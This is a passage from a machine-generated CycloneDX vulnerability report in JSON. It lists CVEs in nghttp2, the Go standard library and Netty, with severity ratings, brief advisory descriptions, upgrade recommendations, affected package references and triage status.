"urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-27135", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 617 ], "description": "nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. Prior to version 1.68.1, the nghttp2 library stops reading the incoming data when user facing public API `nghttp2_session_terminate_session` or `nghttp2_session_terminate_session2` is called by the application. They might be called internally by the library when it detects the situation that is subject to connection error. Due to the missing internal state validation, the library keeps reading the rest of the data after one of those APIs is called. Then receiving a malformed frame that causes FRAME_SIZE_ERROR causes assertion failure. nghttp2 v1.68.1 adds missing state validation to avoid assertion failure. No known workarounds are available.", "recommendation": "Upgrade libnghttp2 to version 1.43.0-6.el9_7.1", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-27135" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/20/3" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7896" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-27135" }, { "url": "https://bugzilla.redhat.com/2441268" }, { "url": "https://bugzilla.redhat.com/2442922" }, { "url": "https://bugzilla.redhat.com/2448754" }, { "url": "https://bugzilla.redhat.com/2453151" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-7896.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:7668" }, { "url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1" }, { "url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6" }, { "url": "https://linux.oracle.com/cve/CVE-2026-27135.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-8339.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135" }, { "url": "https://ubuntu.com/security/notices/USN-8233-1" }, { "url": "https://ubuntu.com/security/notices/USN-8233-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-27135" } ], "published": "2026-03-18T18:16:26+00:00", "updated": "2026-03-23T17:51:17+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.43.0-6.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-33811", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 415 ], "description": "When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.", "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33811" }, { "url": "https://go.dev/cl/767860" }, { "url": "https://go.dev/issue/78803" }, { "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4981" } ], "published": "2026-05-07T20:16:42+00:00", "updated": "2026-05-12T20:23:02+00:00", "affects": [ { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-33814", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "description": "When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.", "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33814" }, { "url": "https://go.dev/cl/761581" }, { "url": "https://go.dev/cl/761640" }, { "url": "https://go.dev/issue/78476" }, { "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33814" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4918" } ], "published": "2026-05-07T20:16:42+00:00", "updated": "2026-05-08T19:16:30+00:00", "affects": [ { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-33870", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "ghsa" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "cwes": [ 444 ], "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.", "recommendation": "Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.10.Final", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33870" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33870" }, { "url": "https://github.com/netty/netty" }, { "url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870" }, { "url": "https://w4ke.info/2025/06/18/funky-chunks.html" }, { "url": "https://w4ke.info/2025/10/29/funky-chunks-2.html" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33870" }, { "url": "https://www.rfc-editor.org/rfc/rfc9110" } ], "published": "2026-03-27T20:16:34+00:00", "updated": "2026-03-30T20:12:16+00:00", "affects": [ { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, 